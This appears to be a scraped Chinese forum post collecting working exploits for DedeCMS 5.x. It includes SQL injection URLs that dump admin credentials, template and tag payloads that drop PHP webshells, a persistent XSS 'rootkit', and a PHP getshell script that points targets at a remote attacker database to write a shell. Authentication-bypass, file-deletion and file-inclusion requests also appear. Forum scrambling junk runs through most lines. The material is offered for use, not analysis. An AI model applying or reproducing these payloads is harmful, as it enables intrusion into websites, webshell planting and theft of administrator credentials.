|
|
% R: i _ m# n1 S% x
Dedecms 5.6 rss注入漏洞# n+ @' A+ r5 I' s
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=18 d4 O, n p, p9 M
) S# t r6 ~- z( l- i: a
8 G# U% d! d% L2 N6 W c
' p, w+ S9 o' P0 K7 c* E+ Q; m* x" ]* N
- t/ I( M8 Q7 z5 t/ N! [
, y( A6 N& G% P! C& p0 W F/ E* k. k# h
6 b% {; T- D ~0 c, d, ?" a
6 E5 B$ S! L8 L* Y2 w- r u
DedeCms v5.6 嵌入恶意代码执行漏洞
1 f ]9 ]% Y4 s- g# S2 a* B% a注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
! i+ ^: ^( N3 v: R; R7 X发表后查看或修改即可执行, N8 l' g! Q' W7 `# Z/ W1 i& T. c% e
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}5 [, W+ d- g$ ?, E
生成x.php 密码xiao,直接生成一句话。9 m: l" T6 ~& p5 M
1 Z$ N3 e5 x1 X0 V9 y) V( M
. O% K( p/ f* u; @ I B
- C+ I9 s: e* o
& B) c1 |: }3 _) H" w6 `* s, @7 {2 N5 N; R0 {9 m
+ H% b u3 D: y8 F; q' `# @4 d K. A
C6 a% j3 [. Z7 j
Dede 5.6 GBK SQL注入漏洞
+ o4 H6 `; [3 Dhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
& O) ^- ~" L( _+ R" Thttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe# Q3 d2 g$ S! A; a2 a
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
1 {9 n8 l3 F- d- y: T' e* B! [6 I+ ?# W4 e3 l7 ^5 w
; ?- B8 R6 v" K: E
5 W4 o- v. s) U! s: y8 {' T& K
9 b3 r) G7 b1 J& {
% B, i% x! i4 d' O) Q
$ }. L& R. j _* s' h+ a3 y" z& s/ @7 @
; g7 f- I0 }0 {6 k' v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
- q5 q g! ^9 rhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( V* |* e" `+ q9 o, F) e3 A4 a! I; m* g" T) \3 x9 P
* [3 S; u. {3 W! N4 ^; A, s9 ?* X1 Z5 a# {( p2 n
5 z0 J$ P0 F* Y$ w9 r* P
' G3 a; H. a1 j! E y
# _0 C4 V8 e6 z' LDEDECMS 全版本 gotopage变量XSS漏洞
+ f$ h# p+ ]4 l& E1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 % R; w) F3 `: G; l
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
- F4 o/ [( W1 G6 D9 h
( I7 }6 ~/ i3 i! M9 s: t/ U6 x" N
o0 c5 {9 Y% e+ G2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 / s& K) _. V; j% ^1 a
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
8 q* G V4 ~) y" ~
& |) y' L: a F( O7 p# R
9 }/ L' n2 i: D* Ghttp://v57.demo.dedecms.com/dede/login.php
5 K! @" d" f* R( p" C
K% A8 S- y/ v! j) x8 j+ S$ @. ~! Y3 Z0 }# @
color=Red]DeDeCMS(织梦)变量覆盖getshell
# P8 _/ B0 i% A7 z& q n#!usr/bin/php -w$ o. u* h! t9 m& E
<?php
D; O4 U* ^& |5 D9 I9 Y5 nerror_reporting(E_ERROR);
! H4 J" m; T1 h0 ?set_time_limit(0);4 U, s/ d$ o& m. |$ g/ H
print_r('8 T+ f2 J# a9 m, w& C) j
DEDEcms Variable Coverage
' H2 @# z/ Z" n3 [Exploit Author: www.heixiaozi.comwww.webvul.com* ?( n3 ?1 P3 X: H; W
);2 m; B% B2 I$ K) D" }
echo "\r\n";
0 x, B+ E" k% J2 sif($argv[2]==null){
' I- e+ [9 {; W" d7 c& [! eprint_r('0 k/ c# r* V/ N
+---------------------------------------------------------------------------+
$ T/ ]! @" @8 H3 WUsage: php '.$argv[0].' url aid path V* \" D1 t; p' q
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/; K+ p, t5 b/ W( b$ L. s
Example:
+ u) M( j8 A' v9 W3 Nphp '.$argv[0].' www.site.com 1 old8 g8 P: E) q4 N; c1 ^
+---------------------------------------------------------------------------+
- D$ c C8 D, |');+ D5 Y! u3 E1 l0 U3 {9 }
exit;$ s& c5 W# d/ x- ^2 M
} X3 w4 Z! s x! [
$url=$argv[1];0 i6 |" o) X% x" c6 |3 V
$aid=$argv[2];
8 n$ F; R, N, O' z4 ]% L: I, k$path=$argv[3];
4 k5 e0 V p# Z% ]* S1 A6 ?+ X$exp=Getshell($url,$aid,$path);
" G3 w* R D* s& ?if (strpos($exp,"OK")>12){) J K) ~0 [% M) I& F
echo "( |- a4 b5 w. }; o+ p" X& C
Exploit Success \n";
) S7 w/ i1 r1 B% Uif($aid==1)echo "
) J. V# w# q4 \/ V: F2 i( dShell:".$url."/$path/data/cache/fuck.php\n" ;
" _6 Y4 p8 |) U
( M" ]. J8 S8 \3 }' G, R% `5 v6 Y6 F
5 L5 @$ k5 ?, H1 gif($aid==2)echo "
9 |4 O7 F% l/ p4 Z# xShell:".$url."/$path/fuck.php\n" ;
8 {% b! q7 t) I1 n$ B& c4 }" }7 c. _
+ o( W( k7 i7 ~
if($aid==3)echo "
# K; i- r# ^: Z3 c8 T. y3 s; RShell:".$url."/$path/plus/fuck.php\n";
: S; b( n$ N, y. }7 u
1 z2 I+ p, ]# m8 e% g- |) H2 b
1 N* F% M( O- m. X5 `}else{2 q4 J9 F7 p( b: V+ N1 ^2 r
echo "
, `5 l6 V6 i0 C8 TExploit Failed \n";
. n7 R* ]9 w1 n& T+ o) k}/ u4 s5 A' k! L- z) M
function Getshell($url,$aid,$path){
7 g; i& d2 i! z- [* ^- s$id=$aid;
9 c2 t* [- g/ K9 \+ D$host=$url;
" m* w4 [* E$ g1 X$ P" b$port="80";
- H' V# G/ t$ z$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, q2 b& ]4 O \4 y( a6 \* L2 j$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";' [; {: \4 j8 s7 S- U% G2 l; M
$data .= "Host: ".$host."\r\n";
1 T- b4 r# \. J* Z# c& j' s$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
+ Q- g1 T0 I% d! \0 h$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";7 Z* n! A9 d! Z9 N- W& _" }( @
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
) b" A% ?- R3 i' O7 L" L z//$data .= "Accept-Encoding: gzip,deflate\r\n";. }5 Y# X) s( V5 N" v, V' F
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";/ _- {4 v. n2 \7 A* ^
$data .= "Connection: keep-alive\r\n";
2 ?3 K, v; K4 I6 f9 C2 B$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
' n( c5 \7 K H' f+ v0 l' u1 e# O$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
! J1 ?7 q+ t; ^7 F' h" y) m' ^! p+ V$data .= $content."\r\n";
" n- S! W+ d' Y; |$ock=fsockopen($host,$port);% L: Y* H' i: g; s
if (!$ock) {
9 P% y: s3 ?* q& t4 Qecho "
* K* h* r- _% HNo response from ".$host."\n";
- E# ^4 b6 b1 c2 b/ ^}
6 u' Q/ Y5 |# U% `+ `+ Tfwrite($ock,$data);0 u, A' K$ H5 R" I
while (!feof($ock)) {
% z: i- D7 s" u0 b2 r$exp=fgets($ock, 1024);
: Q0 }0 n* B. O! ~0 \& B3 u; yreturn $exp;2 u* o# g0 S2 C3 v) c8 s
}: K8 ]/ t/ \3 w) e5 f
}
( V5 p. a9 V( R& R$ E" w6 |! X; X- g: f: M2 H
( b5 `$ J5 }- n( n2 Z7 A
?>! q4 f3 t2 Q j& C8 U n
2 t8 y# a% H" f2 G( H4 F
+ o4 {, o: g0 c, @2 s
8 t% L |* d% A2 X5 U) k2 I! Q) s( p/ G0 M1 p1 K
; y+ g* s7 d& e: o$ [: z
! d$ r, ?5 {' N" a. i- Q& e1 X- A
7 @9 l* H4 a7 Z1 P5 {
) u: ^5 d) e& U( |# i. I# M; E7 @7 S5 ~, s! w: P
( M% u& u- O% ]! {2 ^. j
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: a$ G! Y8 w3 d" m8 l& r, a9 yhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) {3 j9 F w7 d, g* D8 \- z: G! X' P2 x! K/ J& l3 s
* _5 v/ H2 c" L) _+ {$ p把上面validate=dcug改为当前的验证码,即可直接进入网站后台
a( u; I8 c, d2 n0 B% o: H
0 T U% G# r& Q( H8 z6 S" i3 G
/ I+ v+ z* r, E此漏洞的前提是必须得到后台路径才能实现! q* [9 `' h+ o
. g. `- Q: h" T) I$ l! m/ `
* |/ m( M9 C' t% ?
" }* C, f* B2 i9 [+ L- H3 f" r+ J6 C
' @2 P8 [7 H9 m: ?
7 ~! M$ n1 |9 v3 L0 E1 Q e
0 d. m( n# u4 q9 p+ a5 B
' P% `' Q& E- k$ A8 A B; b" H) `4 l
; a8 y: f1 c4 X yDedecms织梦 标签远程文件写入漏洞0 }9 }& A% {8 H% C. {# R/ c \
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
( L. ?3 f; g* J7 _4 l
7 P+ t: Q, X$ E$ @
( [/ P& w ^& w) y1 ]) ^3 j再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 . w' j+ P0 a; H6 i, ? V3 g& ~
<form action="" method="post" name="QuickSearch" id="QuickSearch">3 h; j4 m) K* ]( {2 @
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
) t8 K+ n6 w2 D2 U+ {% w% s<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> V7 y# i; u. V
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
; w. }' W4 Q" S- ^" o<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />' p6 f5 @6 s, M" [( c' R% h0 y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- l4 t: L0 l/ e3 P3 Q0 r$ w
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" d' n- g7 v4 F
<input type="text" value="true" name="nocache" style="width:400">) c7 G& k- t5 q
<input type="submit" value="提交" name="QuickSearchBtn"><br />! P. _: u' B, f w
</form>% ? c- y5 x, \( M; y3 v, |1 U9 J" z
<script>; B$ V% f/ j+ e) {9 h
function addaction()
/ d! z- w; B5 i# I{" g# E1 c' b% p
document.QuickSearch.action=document.QuickSearch.doaction.value;$ O$ b& B7 C0 [/ F# p" A: ~
}
- P- n |) y$ o( g4 \5 x' W</script>. X9 N: j- h6 v X# J) J9 L7 U+ ]
- R% |5 A+ R: |) }7 j( o* k5 w* X& F( A
" h3 h1 P5 P/ _1 b P2 N5 f& T3 ~( ~- V% i, v9 Y4 x3 O Z0 T
+ Q2 a/ l- E6 s. y7 o V' Y. V7 a$ w: @, U5 Y z# R" p# C
7 { F t4 A% v3 ]1 R( d
1 v8 C* [( H* W! G h, B0 }/ }2 d0 U# Z6 ~+ i5 F- o
8 c1 O! h2 _$ C* w
! k- O1 e9 m7 H3 e4 v( i% ?
DedeCms v5.6 嵌入恶意代码执行漏洞
! i/ P# B0 i! D& W7 E5 U注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
- P" t/ m( p& l4 O! la{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( [$ P4 \) q6 _, J生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
' b$ @3 q$ H" T. O( u3 i9 d9 `0 uDedecms <= V5.6 Final模板执行漏洞
( {) t# @9 f! g2 e, v7 k* e) n" z9 n注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
; E: T/ u5 j7 h& Tuploads/userup/2/12OMX04-15A.jpg
7 E: \# Q# {, _4 ^3 u$ O* s$ f7 L. m3 H
$ |, V# F+ ~9 K" i; R) W
模板内容是(如果限制图片格式,加gif89a):
! F, x2 r( J4 \{dede:name runphp='yes'}1 F: D( F! F0 |, o+ S
$fp = @fopen("1.php", 'a');9 t2 K- F( Y& M' T
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
% r" {* T7 i" z/ r: f5 I@fclose($fp);* W5 k5 M% x) E7 L
{/dede:name}
2 c7 f8 t" ?$ V/ q A9 z& `2 修改刚刚发表的文章,查看源文件,构造一个表单:
L3 R# ^( Z1 h9 _% U! R5 K6 f/ G<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">+ W. A4 n* k3 ^! B# F0 }+ F" s3 z
<input type="hidden" name="dopost" value="save" />
( g; T: [* l; U0 G6 g0 o9 E" h<input type="hidden" name="aid" value="2" />
- Q. i/ _$ Y( O<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
' V+ M. u# w6 g" f1 K+ }<input type="hidden" name="channelid" value="1" />$ G4 B( V* a q: t7 j/ s, |. N) T B. a' w
<input type="hidden" name="oldlitpic" value="" />
0 \6 z( t# i6 `. J8 L( h# r<input type="hidden" name="sortrank" value="1275972263" />& M1 C5 j, y( [3 q
& p+ x4 B( O7 m: w. H( X2 W7 U; J b, R& p# K
<div id="mainCp">7 L: \+ R" N# D& K$ }" @
<h3 class="meTitle"><strong>修改文章</strong></h3>
/ ~. f8 m: v9 j, A* o
; x1 p) ]( S, M' v* H' N" L. H+ O& z1 n) `/ O- @5 B& o* y
<div class="postForm">/ j! l$ K! x, E$ P
<label>标题:</label>
9 C6 o7 Z$ {' [1 x* h: `0 D<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>" W0 N1 ^4 {: C* d% f! I. S3 [
$ _: \& Z- y- ? s' y) c
0 C: |1 G+ Z: n7 C; q+ K<label>标签TAG:</label>
. o. K7 j; |) R$ L' _8 {<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)8 z0 r. Z- _3 d' K, Y0 c: `; k
+ [, M) B4 E! l2 t. F% |7 o
3 X& F! M. a }! |<label>作者:</label>0 x* B( D* w# K/ B+ U- X
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>: I. _' l( @# O4 f s0 @
' Z7 b% n: F5 `% [+ }4 D8 G) b3 M" P# P9 n' W
<label>隶属栏目:</label>5 @- K8 J4 z' U' _' w/ M
<select name='typeid' size='1'>
0 Q, ~% D& L6 }<option value='1' class='option3' selected=''>测试栏目</option>
: J+ f% z& U* ~! p6 ?) |</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
2 I% T) F6 I, M& B3 P. M- u" x% ~6 i, a1 n2 |: @
' L- U; `" }6 `! w* p. R# R4 [<label>我的分类:</label>
; }( W) ]/ {' U! X. J<select name='mtypesid' size='1'>
% [* R; S0 L. A1 o* _<option value='0' selected>请选择分类...</option>
# L1 x/ A4 o2 {<option value='1' class='option3' selected>hahahha</option>7 Z. K: m% q i/ K- c9 N% w% f7 C$ y" g% p
</select>
7 p' g) X7 I% N8 V; E# N0 i y$ P" D/ N) F# F
. `, h; j# V& u1 }
<label>信息摘要:</label>
7 b& t4 I6 U- N7 x' q" P. v<textarea name="description" id="description">1111111</textarea> o( N4 Q/ w5 D- R" S
(内容的简要说明), y& S$ H& e5 ~6 e* K! r/ F3 f- E( X
) y4 _7 o# V8 {" n/ E7 }7 k
! D. t- l1 @7 R" f8 z2 y& v<label>缩略图:</label>
$ \& O3 n+ U; I$ ~. n* ?* K7 f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/># `: i: @2 e. B3 b2 O4 x8 a; _3 T
8 @/ p0 y& ~! r E
0 K8 b- k" v7 S<input type='text' name='templet'
/ E& p2 L+ ^+ V/ c6 G: Gvalue="../ uploads/userup/2/12OMX04-15A.jpg"> e X. Q) j+ ^1 J* F4 A& t/ x% r
<input type='text' name='dede_addonfields', M; U- \- R' i/ ]( j: d8 Q$ n, O
value="templet,htmltext;">(这里构造); ^, z! |9 l5 j% Q- R$ ]! u& t
</div># q# ^7 q8 v' U& ~# i5 B
' W' [ \+ p/ y" d
# c" q; `7 M0 ~/ X4 g/ Y+ f( O* Z
<!-- 表单操作区域 -->' N! f$ [, Z) _3 b. ~+ o0 S* `7 {
<h3 class="meTitle">详细内容</h3>. [! x. h E Y- y6 a- H% G
3 S V" ]' S, e( Q5 h6 N7 Z9 c. D! Q1 B3 z
<div class="contentShow postForm">
$ |# y( ^5 D$ _3 D<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>8 c# s2 q% E6 U- y3 K: |
( T1 G) F8 \6 g, ]0 G p3 H
5 @+ U3 @% [0 L8 E/ |7 |/ T& ?<label>验证码:</label>7 K( k E2 v3 m; ]- L5 I! f
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />2 t6 h6 g4 ^/ D* X' g
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" /># \% ~( x8 Q" l
; ^, k# b( ?# F X% v" {+ B( e, z* u' T7 H
<button class="button2" type="submit">提交</button>$ l% G2 }& _$ h" F% c
<button class="button2 ml10" type="reset">重置</button>
9 A1 r. C6 j4 c* Y8 K</div>
! L {! V% q Z" m/ N
A, H3 z: a& j" m- W" }' k# M* g A1 I8 |3 m E3 N0 K5 g
</div>" G8 j4 t/ c* p' M
' U% H) A- `/ H" u7 [: s+ k
, e @! D. ?+ ]+ w$ R u2 O+ H; n
</form>6 r" K8 O/ \& O7 @% H2 N( g9 }8 r
7 m# ]+ |; z) V- I0 ?
( R) \4 E( r$ b G/ w* e) H提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:5 L% ^6 v+ o( j% p0 \( ?
假设刚刚修改的文章的aid为2,则我们只需要访问:8 ]0 q/ z0 ^3 C2 S2 }" h
http://127.0.0.1/dede/plus/view.php?aid=2
0 [# L0 v4 b% H: \7 O/ C即可以在plus目录下生成webshell:1.php
# H; n8 x! w4 E4 E
$ i( F5 ?3 N) ^; [0 R6 z& j
A/ j: t' R! i# i4 k
8 Y3 m# h* e& K( o# q0 O. k- ?; z- z4 o# K
. C0 f- @" Q! ]) t! X+ C! E5 B
$ h6 _1 k3 {4 V4 l% ~0 E, Q1 d! `% X; o9 E) X7 O; u" W. M9 M9 z
: S! g, j, y4 B! I I0 E K3 @7 c6 w4 E) q6 \' \
3 }. Q2 z0 b6 A1 M$ A) _& O2 c
$ {( F( n3 I7 P( g- p, p2 G% b& D
5 d# P) G$ {" p7 N5 }7 ?
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)* U, i ]& r8 q
Gif89a{dede:field name='toby57' runphp='yes'}
) J1 s+ f e0 [; P; m6 B2 lphpinfo();( K" N* f/ w) e9 ^. p
{/dede:field}
- ~# x1 `( E1 f4 l保存为1.gif
- `/ l6 k( b* Q, _- {1 e<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
6 d1 N8 Q' h/ t8 [<input type="hidden" name="aid" value="7" /> * u) u9 y+ L* H) i8 S
<input type="hidden" name="mediatype" value="1" />
8 n# j7 Q3 e* m<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> $ o: X6 t, H0 R! S9 }. j6 m+ E
<input type="hidden" name="dopost" value="save" />
; l3 n) T4 `. y D3 v1 Y' Z8 C7 J<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> - e6 c+ y4 Y. Z9 I- w3 H
<input name="addonfile" type="file" id="addonfile"/>
$ F( R4 I5 y6 o' V) \7 H<button class="button2" type="submit" >更改</button> ) h; _5 p: `! K, c
</form>
0 g$ d) }( m0 `' i6 v; b( s! |+ q
- ~9 \9 w- F# L
$ i; l" N/ T+ ]: c. Z* q5 R! m h构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
4 q9 U8 I' ?$ l+ b- D: ?6 p发表文章,然后构造修改表单如下:
% V" U8 Z9 _0 g8 j8 e' V; l& ?3 n- H7 M# Q
+ _. S3 \0 h9 G
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> . H% i: A% P, M' _8 T; W
<input type="hidden" name="dopost" value="save" />
' e4 |. P: `+ ~/ _- a, b9 ]5 }<input type="hidden" name="aid" value="2" />
& W9 a4 X! s8 g6 o$ W; B3 {<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ( N+ ]% L) x/ W' n/ ^. ^
<input type="hidden" name="channelid" value="1" /> # h% n8 E% ^1 ~0 T5 _& ?! \8 E' W
<input type="hidden" name="oldlitpic" value="" />
! @$ `3 e. L$ O# y8 v<input type="hidden" name="sortrank" value="1282049150" />
, i. h1 R' t- A3 e `<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> . W! y9 f% A t. r
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
% y$ |! @. _8 F. d; v( g0 I! e<select name='typeid' size='1'> $ @) H4 M; E( X( [: N- K) U% f
<option value='1' class='option3' selected=''>Test</option>
7 B+ \8 G* N7 h9 ^- `<select name='mtypesid' size='1'> 0 p4 L' J- _2 l% K# x0 w \' @
<option value='0' selected>请选择分类...</option>
: O6 a, X* J; S E<option value='1' class='option3' selected>aa</option></select>
( L2 B- P& d& x; L6 e9 l! d<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
& L) z9 ~% P7 K/ e( p$ I7 F<input type='hidden' name='dede_addonfields' value="templet">
?5 c' X! r4 `- M8 o<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
5 l' R9 W, a/ i7 r9 O0 x<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
D* ]+ R$ q- c2 U& z$ ~<button class="button2" type="submit">提交</button> ( T W; Q# t$ C0 u0 i
</form>
8 L* y0 x# G8 d0 M( L" u
. c& K: b# W" Q2 A
3 z6 ]& R7 W/ @
6 P1 r+ t$ H& _# w/ D; B0 t: i# i+ x& _2 x0 u' O# ?1 _7 ^3 C: n2 i; Z! B
' k# @. R4 \$ r# I6 ?
8 s$ f& J5 x/ P) s# |3 z; Q: ^& A
* |& N2 F( I* W- o" v/ `" {/ y6 X& ^& x+ U* k" d' ~ _
% |9 F8 K* H3 R- z% z. v2 S
9 `5 b& e& i, N4 f- L; {) f. k; F
0 l5 e6 h" {6 f& h x
" I3 u1 t, z7 A; H# z# O织梦(Dedecms)V5.6 远程文件删除漏洞
( N9 Z0 j9 d4 f' U; }+ Chttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
& g* G( A. ]1 m. q. S1 {" h# u: k' y) F( y
% j y; q( R! k5 Z' c3 P
- y( L1 n" z; I1 M* w
% T* Q! g! J3 h7 o
2 r1 I# x s- D4 j% ?
9 D% @0 x8 S5 Z
& w4 }7 T" F z3 S% v. h3 @/ Z" J$ ~0 h, o. D( I. P
5 g+ o+ l+ a7 n
9 |4 _) k" o5 i0 q1 c* i j
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 , Y0 b; c% i4 q' p: }
http://www.test.com/plus/carbuya ... urn&code=../../9 I* t- A/ `, ~& v, Y* I' s9 _. u4 ^
# W% Y6 z, a/ D# V l
/ p& h5 n( u4 w( T1 m6 \4 o0 x& ^3 G' o: @2 n3 F$ W
6 l8 T/ c0 c' L4 |) j9 q: p& a8 P W" G
, I/ M; q% Q8 ]+ R1 a1 i8 W4 G4 }- J: x/ X1 M
: s2 W$ ?# e9 x& z: F( n2 g" a/ M( t: J2 ]* e' ]. r
9 ?+ d: [1 q7 E8 h4 k2 Z; x' y
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 8 L' L& F3 R3 m4 i
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
- C& ^5 y% Z# l- Z$ |. U6 h密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD50 |$ c& T3 j# m! l8 |5 q
+ Q6 K: f9 `3 x# ^& j( o$ F
4 g4 g/ t: e1 K3 I" R% W
. f. d! x! J Z1 {" L, D9 C7 Q/ h3 Q p2 u4 Y
6 n/ | M! r" x$ e3 a+ E
/ S$ o8 E; v4 X, z2 G9 |
; B# Q# }7 }2 X$ y) F
2 t0 G/ [9 t% }: H; P" c$ `# |
( n+ \4 H6 p% }( r4 ^; I1 s& g6 m9 \
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞8 m9 L/ Q$ M# d3 A6 k4 v
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
A0 ~, ~( u! s" W" |6 G# ^" M7 F$ k9 U* [* u, a% v
, y+ x4 R3 B- l. G) u4 }
8 C/ I5 H7 }3 Q2 {) O* y( l# l" V- j* s! B# j# b8 u
0 h9 r- P& P* t) A/ o c) C9 z$ E
4 y2 k/ J( h* r8 T& Z) S% j9 L1 K
. m6 T8 q& e& E+ K5 b
% Z6 t4 q. m! E0 U. Y1 Q
! C, g) b' b8 l. X
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
) a- V) S( b8 a( m<html>
. X8 v1 q. N- v, W1 b<head>9 {: t- f2 s7 [5 D. Q
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
